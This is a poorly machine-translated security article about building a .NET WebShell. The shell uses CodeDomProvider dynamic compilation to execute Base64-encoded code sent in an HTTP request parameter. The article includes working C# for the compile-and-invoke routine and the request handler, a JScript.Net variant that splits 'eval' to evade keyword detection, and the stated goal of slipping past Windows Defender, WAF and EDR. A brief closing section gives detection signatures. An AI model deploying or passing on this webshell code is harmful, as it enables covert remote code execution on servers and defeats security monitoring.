Implementation of arbitrary code execution based on.Net dynamic compilation technology

One 、 Preface

The current mainstream Waf or Windows Defender Wait for the terminal to kill the software 、EDR Most of them are checked and killed from the signature code , stay .Net and VBS Next, the most common feature of Trojans is eval, For attackers, you need to avoid this system keyword , It can be avoided from deserialization eval, However, it has been publicly believed for a long time that many security products have been able to detect and block such attack requests . The author from the .NET Built in CodeDomProvider Class to realize dynamic compilation .NET Code , To specify JScrip perhaps C# As a compiler language , Compilation of WebShell at present Windows Defender Won't kill . The defender identifies from traffic or terminals "CodeDomProvider.CreateProvider、CreateInstance" Equal characteristic code .

Two 、 Dynamic compilation

.Net The externally input string can be executed as code through compilation technology , Dynamic compilation technology provides two core classes CodeDomProvider and CompilerParameters, The former is equivalent to a compiler , The latter is equivalent to compiler parameters ,CodeDomProvider Support for multiple languages （ Such as C#、VB、Jscript）, Compiler parameters CompilerParameters.GenerateExecutable The default is to generate dll,GenerateInMemory= true When, it means loading in memory ,CompileAssemblyFromSource Represents the data source of the assembly , Then generate the assembly from the compilation results for reflection calls . Finally through CreateInstance Instantiate the object and call the methods in the custom class by reflection .

CodeDomProvider compiler = CodeDomProvider.CreateProvider("C#"); ;     // compiler CompilerParameters comPara = new CompilerParameters();   // Compiler parameters comPara.ReferencedAssemblies.Add("System.dll"); // Add reference comPara.GenerateExecutable = false; // Generate execomPara.GenerateInMemory = true; // In the memory CompilerResults compilerResults = compiler.CompileAssemblyFromSource(comPara, SourceText(txt)); // Source of compiled data Assembly objAssembly = compilerResults.CompiledAssembly; // Compile into an assembly object objInstance = objAssembly.CreateInstance("Neteye.NeteyeInput"); // Create objects MethodInfo objMifo = objInstance.GetType().GetMethod("OutPut"); // Reflection calls method var result = objMifo.Invoke(objInstance, null);

3、 ... and 、 Landing to achieve

In the above code SourceText Methods need to provide compiled C# Source code , The author created NeteyeInput class , as follows ​​​​​​​

public static string SourceText(string txt)        {
               StringBuilder sb = new StringBuilder();            sb.Append("using System;");            sb.Append(Environment.NewLine);            sb.Append("namespace  Neteye");            sb.Append(Environment.NewLine);            sb.Append("{");            sb.Append(Environment.NewLine);            sb.Append("    public class NeteyeInput");            sb.Append(Environment.NewLine);            sb.Append("    {");            sb.Append(Environment.NewLine);            sb.Append("        public void OutPut()");            sb.Append(Environment.NewLine);            sb.Append("        {");            sb.Append(Environment.NewLine);            sb.Append(Encoding.GetEncoding("UTF-8").GetString(Convert.FromBase64String(txt)));            sb.Append(Environment.NewLine);            sb.Append("        }");            sb.Append(Environment.NewLine);            sb.Append("    }");            sb.Append(Environment.NewLine);            sb.Append("}");            string code = sb.ToString();            return code;        }

Class declares OutPut Method , This method passes Base64 Decode the input native string , The author here takes the calculator as a demonstration , take “System.Diagnostics.Process.Start("cmd.exe","/c calc");”

Encoded as

U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBjYWxjIik7

Finally, in the general processing program ProcessRequest Call in method ​​​​​​​

public void ProcessRequest(HttpContext context)        {
               context.Response.ContentType = "text/plain";            if (!string.IsNullOrEmpty(context.Request["txt"]))            {
                   DynamicCodeExecute(context.Request["txt"]); //start calc: U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoImNtZC5leGUiLCIvYyBjYWxjIik7                context.Response.Write("Execute Status: Success!");            }            else            {
                   context.Response.Write("Just For Fun, Please Input txt!");            }        }

Four 、 Other methods

• Jscript.Net Dynamic compilation and disassembly eval

stay .NET In the field of security, the mainstream of Trojans is to eval Keyword execution , Many security products will focus on this , So I need To avoid the eval, And in the .NET in eval Is only found in Jscript.Net, Therefore, you need to specify the dynamic compiler as Jscript, The rest and C# The dynamic compilation of the version is basically the same , By inserting irrelevant characters, the author will eval Take it apart , The code is as follows ​​​​​​​

private static readonly string _jscriptClassText =        @"import System;            class JScriptRun            {
                   public static function RunExp(expression : String) : String                {
                       return e/*@[email protected]*/v/*@[email protected]*/a/*@[email protected]*/l(expression);                }            }";

Just replace the irrelevant string when compiling “/*@[email protected]*/”, Finally, the post compilation reflection executes the target method .

CompilerResults results = compiler.CompileAssemblyFromSource(parameters, _jscriptClassText.Replace("/*@[email protected]*/",""));

5、 ... and 、 Defensive measures

• commonly web There are not many application scenarios , Detect signatures ：CodeDomProvider.CreateProvider、CreateInstance wait , In case of alarm, pay special attention ;

• The assembly generated by compilation is saved on the hard disk as a temporary file , Need to add to the writable directory dll Monitoring of document content ;

• The code involved in this article has been packaged in "https://github.com/Ivan1ee/.NETWebShell"